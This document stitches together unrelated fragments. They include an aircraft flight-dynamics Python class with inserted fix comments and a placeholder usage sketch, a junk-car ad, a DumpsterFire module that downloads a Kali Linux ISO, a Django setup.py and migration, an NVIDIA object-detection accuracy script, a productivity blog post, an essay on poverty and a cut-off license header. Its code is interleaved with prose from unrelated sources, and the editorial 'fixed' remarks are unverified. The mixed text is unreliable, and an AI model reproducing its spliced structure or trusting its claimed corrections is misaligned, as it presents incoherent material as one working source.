        Vsq_vt = u_vt**2+v_vt**2+w_vt**2
        # constants, elemental areas for wings, ht, vt
        K = 0.5*self.rho_
        A_w = self.w_el_*self.chord_w_
        A_ht = self.ht_el_*self.chord_ht_
        A_vt = self.vt_el_*self.chord_vt_
        # calc lift force in wings, ht, vt
        LIFT_LW = CL_lw*K*Vsq_lw*np.flip(A_w, 0)
        LIFT_RW = CL_rw*K*Vsq_rw*A_w
        LIFT_LHT = CL_lht*K*Vsq_lht*np.flip(A_ht, 0)
        LIFT_RHT = CL_rht*K*Vsq_rht*A_ht
        LIFT_VT = CL_vt*K*Vsq_vt*A_vt
        # calc drag force in wings, ht, vt
        DRAG_LW = CD_lw*K*Vsq_lw*np.flip(A_w, 0)
        DRAG_RW = CD_rw*K*Vsq_rw*A_w
        DRAG_LHT = CD_lht*K*Vsq_lht*np.flip(A_ht, 0)
        DRAG_RHT = CD_rht*K*Vsq_rht*A_ht
        DRAG_VT = CD_vt*K*Vsq_vt*A_vt
        # calc pitching moments in wings, ht, vt
        # PITCH_LW = CM_lw*K*Vsq_lw*np.flip(A_ht, 0)*np.flip(self.chord_w_, 0)
        # PITCH_RW = CM_rw*K*Vsq_rw*A_w*self.chord_w_
        # PITCH_LHT = CM_lht*K*Vsq_lht*np.flip(A_ht, 0)*np.flip(self.chord_ht_, 0)
        # PITCH_RHT = CM_rht*K*Vsq_rht*A_ht*self.chord_ht_
        # PITCH_VT = CM_vt*K*Vsq_vt*A_vt*self.chord_vt_
        # total pitching moment due to lift and sweep
        # TOTAL_PITCH = PITCH_LW+PITCH_RW+PITCH_LHT+PITCH_RHT+PITCH_VT
        # calc force in body X direction in wings, ht, vt
        LW_X = LIFT_LW*np.sin(alpha_lw)-DRAG_LW*np.cos(alpha_lw)
        RW_X = LIFT_RW*np.sin(alpha_rw)-DRAG_RW*np.cos(alpha_rw)
        LHT_X = LIFT_LHT*np.sin(alpha_lht)-DRAG_LHT*np.cos(alpha_lht)
        RHT_X = LIFT_RHT*np.sin(alpha_rht)-DRAG_RHT*np.cos(alpha_rht)
        VT_X = LIFT_VT*np.sin(alpha_vt)-DRAG_VT*np.cos(alpha_vt)
        # calc force in body Y direction in wings, ht, vt
        VT_Y = LIFT_VT*np.cos(alpha_vt)+DRAG_VT*np.sin(alpha_vt)
        # calc force in body Z direction in wings, ht, vt
        LW_Z = LIFT_LW*np.cos(alpha_lw)+DRAG_LW*np.sin(alpha_lw)
        RW_Z = LIFT_RW*np.cos(alpha_rw)+DRAG_RW*np.sin(alpha_rw)
        LHT_Z = LIFT_LHT*np.cos(alpha_lht)+DRAG_LHT*np.sin(alpha_lht)
        RHT_Z = LIFT_RHT*np.cos(alpha_rht)+DRAG_RHT*np.sin(alpha_rht)
        # Total body forces
        XF = float(thrust)+np.sum(LW_X)+np.sum(RW_X)+np.sum(LHT_X)+np.sum(RHT_X)+np.sum(VT_X)
        YF = np.sum(VT_Y)
        ZF = np.sum(LW_Z)+np.sum(RW_Z)+np.sum(LHT_Z)+np.sum(RHT_Z)
        # Moments about body X, Y, Z axes
        LM = np.sum(-lw*LW_Z-rw*RW_Z)+np.sum(-lht*LHT_Z-rht*RHT_Z)+np.sum(self.vtail_*VT_Y)
        MM = np.sum((LW_Z+RW_Z)*(self.x_cg_-self.x_ac_w_)) \
            +np.sum((LHT_Z+RHT_Z)*(self.x_cg_-self.x_ac_ht_)) \
            +np.sum(self.vtail_*VT_X)  # +np.sum(TOTAL_PITCH)
        NM = np.sum(-rw*RW_X-lw*LW_X)+np.sum(-rht*RHT_X-lht*LHT_X)
        print(XF, YF, ZF, LM, MM, NM)
        return [XF, YF, ZF, LM, MM, NM]
    # uses an interpolation function to calculate the exhaust velocity and
    # thrust of the prop using momentum theory
    def thrustcalc(self, power, u):
        if power > 0:
            # (fixed: the original referenced self.U2func, rho and diskA, none of
            # which exist in this scope; the instance attributes are used instead)
            u2 = self.U2func_(power, u)
            force = 0.5*self.rho_*self.diskA_*(u2**2-u**2)
        else:
            force = 0
        return force

    # calculates the chord of the wing at each point in its station
    def chord(self, wing, span, area, rc, tc):
        k = tc/rc
        A = 2*area/((1+k)*span)
        # (fixed: the original used B = 1*(1-k)/span, which does not recover tc at
        # the tip for stations running to span/2; linear taper requires the factor 2)
        B = 2*(1-k)/span
        res = A*(1-B*wing)
        return res

    # calculates the lift coefficient at each station along the wing
    def CL(self, wing, dCL_da, alpha, CL0, displacement, dCL_de, pos1, pos2):
        aileronCL = self.heaviside(wing, pos1, pos2)
        # unstalled is 1 between the stall angles and 0 outside them
        # (the original called this mask `stalled`, which inverted its meaning)
        unstalled = (alpha >= self.alphamin_) & (alpha <= self.alphamax_)
        res = unstalled.astype(int)*(CL0+dCL_da*alpha+aileronCL*dCL_de*displacement)
        return res

    # calculates the moment coefficient at each station along the wing
    def CM(self, wing, dCM_da, alpha, CM0, displacement, dCM_de, pos1, pos2):
        aileronCM = self.heaviside(wing, pos1, pos2)
        # (fixed: the original referenced bare alphamin/alphamax instead of the attributes)
        unstalled = (alpha >= self.alphamin_) & (alpha <= self.alphamax_)
        res = unstalled.astype(int)*(CM0+dCM_da*alpha+aileronCM*dCM_de*displacement)
        return res

    # heaviside operator, returns a vector of 1s and 0s to make array operations easier
    def heaviside(self, wing, pos1, pos2):
        res = (wing >= pos1) & (wing <= pos2)
        return res.astype(int)

    # leapfrog integrator to calculate accelerations and velocities in the body frame,
    # and displacements in the inertial frame
    def nlti(self, u, v, w, p, q, r, x, y, z, phi, theta, psi, A):
        # linear accelerations in the body frame
        du_dt = float(A[0]/self.m_-self.g_*np.sin(theta)-q*w+r*v)
        dv_dt = float(A[1]/self.m_+self.g_*np.cos(theta)*np.sin(phi)-r*u+p*w)
        dw_dt = float(A[2]/self.m_+self.g_*np.cos(theta)*np.cos(phi)-p*v+q*u)
        # angular accelerations in the body frame
        dp_dt = float(A[3]/self.Ixx_-(self.Izz_-self.Iyy_)/self.Ixx_*q*r)
        dq_dt = float(A[4]/self.Iyy_-(self.Ixx_-self.Izz_)/self.Iyy_*r*p)
        dr_dt = float(A[5]/self.Izz_-(self.Iyy_-self.Ixx_)/self.Izz_*p*q)
        # half time step representation of linear velocities
        u += 0.5*(self.udot_+du_dt)*self.timestep_
        v += 0.5*(self.vdot_+dv_dt)*self.timestep_
        w += 0.5*(self.wdot_+dw_dt)*self.timestep_
        # half time step representation of angular velocities
        p += 0.5*(self.pdot_+dp_dt)*self.timestep_
        q += 0.5*(self.qdot_+dq_dt)*self.timestep_
        r += 0.5*(self.rdot_+dr_dt)*self.timestep_
        # using cosine matrices to convert velocities and accelerations to inertial frame
        # (is there a better way to handle accelerations?)
        I = self.lindcm([-phi, -theta, -psi], [du_dt, dv_dt, dw_dt])
        X = self.lindcm([-phi, -theta, -psi], [u, v, w])
        J = self.angdcm([-phi, -theta, -psi], [dp_dt, dq_dt, dr_dt])
        W = self.angdcm([-phi, -theta, -psi], [p, q, r])
        # linear displacements in the inertial frame
        x += X[0]*self.timestep_+0.5*I[0]*self.timestep_**2
        y += X[1]*self.timestep_+0.5*I[1]*self.timestep_**2
        z += X[2]*self.timestep_+0.5*I[2]*self.timestep_**2
        # angular displacements in the inertial frame
        phi += W[0]*self.timestep_+0.5*J[0]*self.timestep_**2
        theta += W[1]*self.timestep_+0.5*J[1]*self.timestep_**2
        psi += W[2]*self.timestep_+0.5*J[2]*self.timestep_**2
        # store velocities so that in the next step the half time step velocities can be calculated
        self.udot_ = du_dt
        self.vdot_ = dv_dt
        self.wdot_ = dw_dt
        self.pdot_ = dp_dt
        self.qdot_ = dq_dt
        self.rdot_ = dr_dt
        return [u, v, w, p, q, r, x, y, z, phi, theta, psi]

    # direction cosine matrix function
    def lindcm(self, A, B):
        phi = A[0]
        theta = A[1]
        psi = A[2]
        DCM = np.array([[np.cos(theta)*np.cos(psi),
                         np.cos(theta)*np.sin(psi),
                         -np.sin(theta)],
                        [np.sin(phi)*np.sin(theta)*np.cos(psi)-np.cos(phi)*np.sin(psi),
                         np.sin(phi)*np.sin(theta)*np.sin(psi)+np.cos(phi)*np.cos(psi),
                         np.sin(phi)*np.cos(theta)],
                        [np.cos(phi)*np.sin(theta)*np.cos(psi)+np.sin(phi)*np.sin(psi),
                         np.cos(phi)*np.sin(theta)*np.sin(psi)-np.sin(phi)*np.cos(psi),
                         np.cos(phi)*np.cos(theta)]])
        transform = np.dot(np.transpose(DCM), np.array(B))
        return transform

    # angular (Euler rate) cosine matrix function
    def angdcm(self, A, B):
        phi = A[0]
        theta = A[1]
        ACM = np.array([[1, np.sin(phi)*np.tan(theta), np.cos(phi)*np.tan(theta)],
                        [0, np.cos(phi), -np.sin(phi)],
                        [0, np.sin(phi)/np.cos(theta), np.cos(phi)/np.cos(theta)]])
        W = np.dot(ACM, np.array(B))
        return W

    # calculate body force and moment coefficients
    def coefs(self, u, v, w, A):
        XF, YF, ZF = A[0], A[1], A[2]
        LM, MM, NM = A[3], A[4], A[5]
        q = 0.5*self.rho_*(u**2+v**2+w**2)
        CX = XF/q/self.Sref_w_
        CY = YF/q/self.Sref_w_
        CZ = ZF/q/self.Sref_w_
        CL = LM/q/self.Sref_w_/self.wspan_
        CM = MM/q/self.Sref_w_/self.cbar_w_
        CN = NM/q/self.Sref_w_/self.wspan_
        return [CX, CY, CZ, CL, CM, CN]

    # plot the aircraft geometry (incomplete in the original; kept as a stub with
    # the recoverable pieces, fixed to take self and use the instance attributes)
    def plotaircraft(self, ax, X):
        x, y, z = X[0:3]
        # generate geometry using sizing
        yltedge = np.linspace(-self.wspan_/2, 0, 50)
        zltedge = np.zeros_like(yltedge)
        yrtedge = np.linspace(0, self.wspan_/2, 50)
        zrtedge = np.zeros_like(yrtedge)
        xltip = np.linspace(0, self.tc_w_, 50)
        xrtip = np.linspace(0, self.tc_w_, 50)
        zltip = np.zeros_like(xrtip)
        # TODO (placeholders in the original): xltedge, xrtedge, yltip, yrtip,
        # xlledge, xrledge, ylledge, yrledge
        # rotate geometry
        # plot geometry
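A minimal driving sketch for the class above. Nothing below comes from the original source: every numeric value is a made-up placeholder, and the lambda stands in for the user-supplied exhaust velocity interpolant that thrustcalc expects (thrustcalc implements actuator-disk momentum theory, F = 0.5*rho*A*(u2**2 - u**2), so the toy interpolant simply returns a slightly higher exhaust velocity).

# Hypothetical usage: build the geometry once, then alternate the strip theory
# force calculation and the nlti leapfrog step inside a simulation loop.
fc = forcecalc()
fc.setsolverparams(timestep=0.01, udot=0, vdot=0, wdot=0, pdot=0, qdot=0,
                   rdot=0, steps=20, rho=1.225, g=9.81)
fc.setuvals(None, None, None, lambda power, u: u + 5.0)  # toy exhaust velocity model
fc.setacparams(m=10.0, Ixx=1.0, Iyy=1.5, Izz=2.0, proprad=0.2, fuserad=0.1,
               x_cg=0.3, CD0_b=0.05, dCDb_dB=0.0, dCDb_dA=0.0,
               alphamin=-10, alphamax=12)
fc.setwingparams(2.0, 2.0, 0.25, 0.15, 0.0, 0.2, 5.7, 1.0, 0.2, 0.02, 0.3, 0.9, 0.85)
fc.sethtailparams(0.6, 0.0, 0.15, 0.1, 0.0, 1.0, 4.0, 1.0, 0.0, 0.01, 0.0, 0.3, 0.9)
fc.setvtailparams(0.3, 0.0, 0.15, 0.1, 0.0, 1.0, 4.0, 1.0, 0.0, 0.01, 0.0, 0.15, 0.9)
fc.buildgeom()

# state vector: u, v, w, p, q, r, x, y, z, phi, theta, psi
state = [15.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
for _ in range(10):
    forces = fc.forcecalc(100.0, *state[0:6], aileron=0.0, elevator=0.0, rudder=0.0)
    state = fc.nlti(*state, A=forces)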
Call me anytime, anywhere, if you live anywhere near Lowry and I’ll make you the highest cash offer I can for your car. The towing is FREE and I’ll pick up your car within 24 hours. I'm available every day - 7 days a week - and I’ve got to buy at least 10 cars a day. Any year, make, model, or condition. It doesn’t matter whether it runs or drives. I’ve bought cars with a tree through the roof, with the engine in the trunk, vehicles with no doors or windows, some sitting in driveways and garages – some that didn't even start for years. If your car is broken down anywhere near Lowry, sitting at the mechanic's shop, too expensive to fix, or the engine or transmission is gone… give me a call at 1-877-445-0780 and ask for crazy Jim... 'cause I've got cash to spend and I'm ready to buy your car now!
#!/usr/bin/python
#
# Filename:
#
# Version: 1.0.0
#
# Author: Joe Gervais (TryCatchHCF)
#
# Summary:
#
#   Part of the DumpsterFire Toolset. See documentation at
#   https://github.com/TryCatchHCF/DumpsterFire
#
# Description:
#
# Example:
#

import os, sys, urllib

from FireModules.fire_module_base_class import *


class download_kali( FireModule ):

	# (fixed: the original defined __init__ twice; the second definition silently
	# replaced the first, so the two are merged with an optional moofStr)
	def __init__( self, moofStr="" ):
		self.moofStr = moofStr
		self.commentsStr = "FileDownloads/download_kali"

	def Description( self ):
		# (fixed: the original assigned to self.Description, clobbering this
		# method after the first call; a separate attribute is used instead)
		self.descriptionStr = "Downloads Kali distro to local directory"
		return self.descriptionStr

	def Configure( self ):
		self.mDirectoryPath = raw_input( "Enter Directory Path to download files into: " )
		return

	def GetParameters( self ):
		return self.mDirectoryPath

	def SetParameters( self, parametersStr ):
		self.mDirectoryPath = parametersStr
		return

	def ActivateLogging( self, logFlag ):
		print self.commentsStr + ": Setting Logging flag!"
		print logFlag
		return

	def Ignite( self ):
		self.filepath = self.mDirectoryPath + "/" + 'kali.iso'
		print self.commentsStr + ": Downloading Kali to: " + self.filepath
		urllib.urlretrieve( 'http://cdimage.kali.org/kali-2017.2/kali-linux-2017.2-amd64.iso', self.filepath )
		return
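A sketch of how such a FireModule might be driven outside the DumpsterFire menu. The import path and call order are assumptions inferred from the methods above, not taken from the toolset's documentation (Python 2, matching the module itself):

# Hypothetical driver; assumes this file lives at FireModules/FileDownloads/download_kali.py
from FireModules.FileDownloads.download_kali import download_kali

fire = download_kali()
print fire.Description()
fire.SetParameters( "/tmp/downloads" )   # skip the interactive Configure() prompt
fire.Ignite()                            # fetches the ISO to /tmp/downloads/kali.iso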
A social constructionist theory that emerged in the 1980s and has seen significant development in the 21st century. It considers how people negotiate and take up their place in any given context. Positioning Theory (Pinnegar & Murphy, 2011) addresses how individuals subjectively perceive their interrelations with others. It is a narrative theory developed in the early 1990s in the sociological-interpretive field, which has also expanded to education, teaching, and teacher training. Pinnegar, S., & Murphy, M. S. (2011). Teacher educator identity emerging within a teacher educator collective. Studying Teacher Education, 7(2), 211-213.
import os
import imp

try:
    imp.find_module('setuptools')
except ImportError:
    from ez_setup import use_setuptools
    use_setuptools()

from setuptools import setup, find_packages

README = open('README.rst').read()

setup(
    name="goscalecms",
    version=__import__('goscale').__version__,
    packages=find_packages(),
    author="Evgeny Demchenko",
    author_email="[email protected]",
    description="GoScale CMS is an extension of Django CMS. It's a set of unique plugins "
                "and useful tools for Django CMS that makes it very powerful by seamlessly "
                "integrating content from 3rd party websites to make mashups.",
    long_description=README,
    license="BSD",
    keywords="goscale cms django themes content management system mashup google ajax",
    url="https://github.com/sternoru/goscalecms",
    include_package_data=True,
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Topic :: Internet :: WWW/HTTP :: Site Management",
        "Environment :: Web Environment",
        "Framework :: Django",
        "Intended Audience :: Developers",
        "Natural Language :: English",
        "Natural Language :: French",
        "Natural Language :: Russian",
        "Programming Language :: Python",
        "Programming Language :: JavaScript",
        "License :: OSI Approved :: BSD License",
    ],
    install_requires=[
        "pytz",
        "unidecode",
        "BeautifulSoup",
        "feedparser",
        "gdata",
        "python-dateutil",
        "simplejson",
        "Django>=1.4,<1.6",
        "django-cms==2.4",
    ]
)
#!/usr/bin/env python3
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import ctypes
import os, sys

# The plugin .so file has to be loaded at global scope and before `import torch` to avoid cuda version mismatch.
NMS_OPT_PLUGIN_LIBRARY = "build/plugins/NMSOptPlugin/libnmsoptplugin.so"
if not os.path.isfile(NMS_OPT_PLUGIN_LIBRARY):
    raise IOError("{}\n{}\n".format(
        "Failed to load library ({}).".format(NMS_OPT_PLUGIN_LIBRARY),
        "Please build the NMS Opt plugin."
    ))
ctypes.CDLL(NMS_OPT_PLUGIN_LIBRARY)

import argparse
import json
import time

sys.path.insert(0, os.getcwd())

from code.common.runner import EngineRunner, get_input_format
from code.common import logging
import code.common.arguments as common_args

import numpy as np
import torch
import tensorrt as trt
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval


def run_SSDResNet34_accuracy(engine_file, batch_size, num_images, verbose=False,
                             output_file="build/out/SSDResNet34/dump.json"):
    threshold = 0.20

    runner = EngineRunner(engine_file, verbose=verbose)
    input_dtype, input_format = get_input_format(runner.engine)
    if input_dtype == trt.DataType.FLOAT:
        format_string = "fp32"
    elif input_dtype == trt.DataType.INT8:
        if input_format == trt.TensorFormat.LINEAR:
            format_string = "int8_linear"
        elif input_format == trt.TensorFormat.CHW4:
            format_string = "int8_chw4"
    image_dir = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"),
                             "coco/val2017/SSDResNet34", format_string)
    val_annotate = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"),
                                "coco/annotations/instances_val2017.json")

    coco = COCO(annotation_file=val_annotate)

    image_ids = coco.getImgIds()
    cat_ids = coco.getCatIds()
    # Class 0 is background
    cat_ids.insert(0, 0)
    num_images = min(num_images, len(image_ids))

    logging.info("Running validation on {:} images. Please wait...".format(num_images))
    coco_detections = []
    batch_idx = 0
    for image_idx in range(0, num_images, batch_size):
        end_idx = min(image_idx + batch_size, num_images)
        img = []
        img_sizes = []
        for idx in range(image_idx, end_idx):
            image_id = image_ids[idx]
            img.append(np.load(os.path.join(image_dir, coco.imgs[image_id]["file_name"] + ".npy")))
            img_sizes.append([coco.imgs[image_id]["height"], coco.imgs[image_id]["width"]])

        img = np.stack(img)

        start_time = time.time()
        outputs = runner([img], batch_size=batch_size)
        trt_detections = outputs[0]
        if verbose:
            logging.info("Batch {:d} >> Inference time: {:f}".format(batch_idx, time.time() - start_time))

        for idx in range(0, end_idx - image_idx):
            keep_count = trt_detections[idx * (200 * 7 + 1) + 200 * 7].view('int32')
            trt_detections_batch = trt_detections[idx * (200 * 7 + 1):idx * (200 * 7 + 1) + keep_count * 7].reshape(keep_count, 7)
            image_height = img_sizes[idx][0]
            image_width = img_sizes[idx][1]
            for prediction_idx in range(0, keep_count):
                loc = trt_detections_batch[prediction_idx, [2, 1, 4, 3]]
                label = trt_detections_batch[prediction_idx, 6]
                score = float(trt_detections_batch[prediction_idx, 5])
                bbox_coco_fmt = [
                    loc[0] * image_width,
                    loc[1] * image_height,
                    (loc[2] - loc[0]) * image_width,
                    (loc[3] - loc[1]) * image_height,
                ]

                coco_detection = {
                    "image_id": image_ids[image_idx + idx],
                    "category_id": cat_ids[int(label)],
                    "bbox": bbox_coco_fmt,
                    "score": score,
                }
                coco_detections.append(coco_detection)

        batch_idx += 1

    output_dir = os.path.dirname(output_file)
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    with open(output_file, "w") as f:
        json.dump(coco_detections, f)

    cocoDt = coco.loadRes(output_file)
    eval = COCOeval(coco, cocoDt, 'bbox')
    eval.params.imgIds = image_ids[:num_images]
    eval.evaluate()
    eval.accumulate()
    eval.summarize()
    map_score = eval.stats[0]

    logging.info("Get mAP score = {:f} Target = {:f}".format(map_score, threshold))
    return (map_score >= threshold * 0.99)


def main():
    args = common_args.parse_args(common_args.ACCURACY_ARGS)
    logging.info("Running accuracy test...")
    run_SSDResNet34_accuracy(args["engine_file"], args["batch_size"], args["num_samples"],
                             verbose=args["verbose"])


if __name__ == "__main__":
    main()
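The accuracy entry point can also be called directly rather than through main(); a sketch, where the engine path is a made-up placeholder for a prebuilt TensorRT engine:

# Hypothetical direct invocation of the function defined above.
passed = run_SSDResNet34_accuracy(
    engine_file="build/engines/ssd-resnet34.b8.int8.plan",  # placeholder path
    batch_size=8,
    num_images=500,
    verbose=True,
)
print("accuracy target met:", passed)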
‘Productivity’ is one term that every individual, as an efficient resource, and every manager, as an effective leader, should expect from themselves and their team. Time is money, and making efficient use of time will not only enable you to gain more; as a team you can achieve higher goals. Productivity is nothing but doing things more efficiently and in a timely manner, getting the most out of your time.

There are different sets of people in an office atmosphere. Some like to finish their work before their day ends while others are bound to procrastinate. In such a scenario, how will you ensure that all the team members are on the same page? As an efficient individual, how will you ensure that all your roles, responsibilities and tasks are organised and managed effectively? Although measuring productivity and its evaluation process is different for each and every role, the basic format and underlying process of designing your work-day are the same across all job roles. Considering the growing demand for improvement in productivity, from small companies to large business houses, we thought we would list some of the tips and tricks to maximise productivity in your workplace.

1. Plan in Advance, never hurts!

Whether you are a small company or a large business house, planning is the first step for productivity. The common notion or misunderstanding among people is that productivity means constantly being busy, crunching numbers or chasing targets. This misconception just leads to ‘getting less done’. Boost your productivity with proper planning and have a to-do list for each day.

Setting up tools in your workplace will reduce ad-hoc tasks and bring every team member onto a centralised platform. With the help of such tools you can not only align the team, assign tasks and allocate timelines, but also ensure the quality of work and generate evaluation reports. Thanks to the SaaS uprising in the past decade that has given birth to several pay-as-you-go time tracking tools like Rescue Time, beautiful calendars like Cal, conversational email tools like Mail-time and team productivity tools like Gridle; you can now have them up and running in no time!

Why would you call a team meeting for a status update? Or involve everyone in trivial decision making? We all love to hate meetings, and get this straight: a 1-hour meeting of 10 people is essentially a 10-hour meeting! And more importantly, 7 in 10 people believe that meetings are unproductive.

“If you had to identify, in one word, the reason why the human race has not achieved, and never will achieve, its full potential, that word would be meetings.” — Dave Barry, Pulitzer prize winning columnist.

When it comes to assigning resources, it is pointless to waste the time of other people in the discussion. Just add those resources who are essential for the task. Define a plan of action and get things grooving. This will help you to efficiently utilise the time of all the resources and scale up your expectations.

4. Great Time to Automate; because, why not?

Automating the regular processes will not only make your delegation simple but also easy for your subordinates and team to understand. When you know how to manage and the team has a clear vision of the path to follow, your productivity scales up.
Zapier has been the go-to platform to automate things!

5. Define a Working Model.. It works.

It is easy to get caught in the inefficient patchwork of emails, apps, excel sheets and chat clients. And once this happens, it's almost impossible to come out. Before you start something, set a process and adhere to it. It will be hard for a while, but you'll thank yourself later! Defining a step-by-step process for the team will enable them to grasp it faster and get into action without much trial and error. With a defined process, you can get things done faster, better and more efficiently.

6. Re-size the Project; Da Vinci did too..

When you are working on a large project it becomes difficult to focus on smaller things. In such a case, it is recommended to break such tasks into smaller chunks. You will be able to define a clear roadmap to cover all the chunks within the given timeline and concentrate on each task. Think how a lion singles out an elephant and concentrates on it while hunting, rather than leaping on the whole herd.

7. Deadlines? But they are good!

All of us have faced it and know the pressure of a deadline very well, but deadlines are good. Nobody is going to kill anybody for missing a deadline, but it motivates us to finish our task before time, quickly and efficiently.

You must be wondering how sharing information can affect productivity. The simple secret is that when a team starts sharing information with each other, they spend less time researching and emailing. So instead of holding the information to yourself, share as much as you can.

9. Wave out Distractions; they kill too..

Whether we browse the internet, take emergency calls, have a quick chat, or take a coffee break, distractions are a part of our work life. Probably before you finish reading this statement, you already know the list of distractions that affect your productivity, so just try to wave them off.

At each and every workplace, when everything is planned and smooth, the major problem arises when unplanned and ad-hoc tasks come up and interfere with the process. Should these tasks be avoided, or should we be prepared for them? The simple answer is to be prepared. Planning and preparation walk hand in hand. When you are planning for new tasks, you also need to be prepared to tackle the unplanned efforts.

It often happens that while you are working on important things, you are asked to work on trivial ones; although you are not ready for that, you are unable to say ‘No’ and ultimately it impacts your productivity. So, the best way to survive such invitations is by building the right boundaries and declining the offer smartly. Enough said! Check this out, thank us later.

Because not all tasks are ‘urgent’, when you have the list of tasks, define the priority of each task. This will help you to finish the major and priority tasks at the earliest and spare time for others.

13. Relish your Hard work, always!

When you have a defined deadline and an important task on priority, you will have to sprint and ensure that it is finished on time, including all the crisis management. At the same time it is also important that once you finish the task, you take a break, relax and relish your hard work!

Improper sleep can badly affect your health and hamper your productivity. Getting complete sleep relaxes your body and brain, which is very necessary for increased output.
We have listed these tips and tricks based on our experiences and research; they can be further updated based on your reviews. So keep sending us your views and comments so we can all benefit from them.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='CaptionedFile',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
                ('caption', models.CharField(max_length=200, verbose_name='caption')),
                ('publication', models.FileField(verbose_name='Uploaded File', upload_to='captioned-files')),
            ],
            options={
                'verbose_name': 'Captioned File',
                'verbose_name_plural': 'Captioned Files',
            },
        ),
        migrations.CreateModel(
            name='UncaptionedFile',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
                ('publication', models.FileField(verbose_name='Uploaded File', upload_to='uncaptioned-files')),
            ],
            options={
                'verbose_name': 'Uncaptioned File',
                'verbose_name_plural': 'Uncaptioned Files',
            },
        ),
    ]
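For reference, a models.py sketch that would produce an initial migration like the one above. It is reconstructed purely from the CreateModel operations; only the file placement is an assumption:

# Reconstructed models matching the two CreateModel operations.
from django.db import models


class CaptionedFile(models.Model):
    caption = models.CharField(max_length=200, verbose_name='caption')
    publication = models.FileField(verbose_name='Uploaded File', upload_to='captioned-files')

    class Meta:
        verbose_name = 'Captioned File'
        verbose_name_plural = 'Captioned Files'


class UncaptionedFile(models.Model):
    publication = models.FileField(verbose_name='Uploaded File', upload_to='uncaptioned-files')

    class Meta:
        verbose_name = 'Uncaptioned File'
        verbose_name_plural = 'Uncaptioned Files'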
Poverty is an emotionally powerful subject. With few exceptions, global human quality of life is structured from a base of economic opportunities, hailed as modern civilization marching to a cadence, seeking prosperity through enterprise, commerce and trade. Contemporary social design is a byproduct of early Mesopotamia, referred to as “the cradle of civilization.” Social patterns evolved from this base, developing geographically mixed cultures in a mutual quest for fiscal gain. Economics, trade and enterprise are world encompassing, with striking disparity and exclusion.

“Absolute poverty” is the most desolate: without adequate food or shelter, barely surviving, and often plagued with extreme hunger and death by starvation. Education and medical services are compromised or non-existent.

“Relative poverty” is a condition gauged according to a threshold established by income demography. US poverty is categorized as relative poverty. Relative poverty is less apparent, homelessness being the most visible circumstance. In Los Angeles County, on a given night, in excess of 80,000 people are homeless.

“Asceticism” is voluntary poverty used as a method of seeking spiritual consciousness and a plane of life in opposition to the omnipresent ambition for affluence through economic status, material gain and accumulation. Practitioners of asceticism vow poverty as a means of teaching, revealing meaningful values beyond the infusion of wealth and abundance as sources of enlightenment.

Kenya and sub-Saharan Africa display vivid, widespread examples of extreme, absolute poverty. Sordid conditions exist in many third world countries; however, statistically the degree is most pronounced in sub-Saharan Africa. The film documentary The End of Poverty? Think Again is a compelling revelation exposing the level of horror these places have become: children gleaning trash heaps for anything of the slightest value. The little work available consists of slave-labor-type jobs with finite wages, taxed heavily by corrupt governments preying on the world’s poorest of the poor.

Many third world regions have abundant natural resources, and industrialized countries have exploited these resources in order to produce manufactured consumer goods for global distribution and economic gain. Large loans were pressed upon these impoverished countries under the guise of projected development, which has never manifested, as industrialized countries continued to extract resources without implementing self-sustaining commerce, leaving a residue of extreme debt without the ability to reduce it. Corrupt governments claim the need for high taxation in order to pay the debt, which is not occurring; thereby the suffering continues.

Countries achieving economic success and prosperity have melded manufacturing and consumption. This formula relies on an expanding rate of consumption. If consumption dwindles, economies dwindle. In present day America excessive consumption is ubiquitous. There is an urgent drive to expand manufacturing and consumption as a means of strengthening economic conditions. Questions appear regarding this social design. Is this balance or imbalance? The collective mentality is, “I have earned everything I own.” A more honest assessment would be, “I have been given opportunity to succeed.” Opportunity does not exist in the sub-Sahara. So, where are the answers? Will disparity continue and increase? Charitable food donations given to oppressed countries are pilfered and sold by corrupt, ruling powers.
Some would say this is a natural process, as the Africans are incapable of competing. Africa was much slower to be influenced by the new civil design, remaining a cohesive hunter-gatherer culture far longer than the Europeans. When I see old photos of tribal Africa I see an extremely self-reliant race of people, harmonious and thriving for thousands of years in a harsh and challenging place. These are very strong people, likely the strongest in the history of humanity. The tribal villages and housing of ancient Africa were far more inviting and comfortable than the hovels of tin and cardboard that modern civilization has bestowed upon them.

No culture has been more exploited than the Africans. The English came first, seized their land, killed their game for sport, and brought an entirely new living design, forcing radical change upon them. They enslaved them and sold them, and the exploitation continues today as natural resources are pillaged without reward, the global glut feeding itself on commandeered wealth and leaving a wake of unfathomable despair.

Natural forces are the source of all earthly endeavors, capable of overpowering human-created dysfunctions. Healing will likely be presented naturally, uninfluenced by the Dow Jones Average or the Gross National Product. Humanity has moved away from its organic roots, seeking idolatrous ritual within material wealth. Early tribal cultures embraced communal uniformity, housing was equal, and the act of sharing was important to security and longevity. Hunter-gatherers were directly connected to the earth; life was sustained by earth’s gifts, creating a harmony which has been lost in the current living design.

Globally we have fallen into ethical contraction, expanding intolerance and the ever-presence of war, questioning direction and purpose. If we as a species are unable to alter inequities, solutions will self-generate. It would behoove the onslaught, the self-feeding frenzy of acquisition, to seek greater balance and sensitivity, gearing energy toward apportionment and equality. As a species we have proven an ability to invent and install highly complex, technical devices; it would seem equally possible to provide basic comforts to those in dire need. Compassion is not complex.
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
